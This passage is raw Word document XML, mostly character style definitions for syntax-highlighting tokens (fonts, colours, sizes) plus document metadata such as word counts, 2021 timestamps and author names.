      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="40A070"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="880000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="4070A0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="BB6688"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:i/>
      <w:color w:val="BA2121"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="38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57">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="38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58">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="06287E"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="19177C"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="007020"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="666666"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="BC7A00"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="7D9029"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="38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69">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="38"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="21"/>
    <w:link w:val="2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32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="74">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="2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8"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="75">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="21"/>
    <w:link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3D55EF-6931-4AFE-A340-415AA8A17C5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671</Words>
  <Characters>2340</Characters>
  <Lines>15</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2544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2021-08-22T11:05:00Z</dcterms:created>
  <dc:creator>快乐每一天</dc:creator>
  <cp:lastModifiedBy>秀秀宏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-22T13:11:27Z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5C118D41890248EF8DDEDA16782AC24B</vt:lpwstr>
  </property>
</Properties>
</file>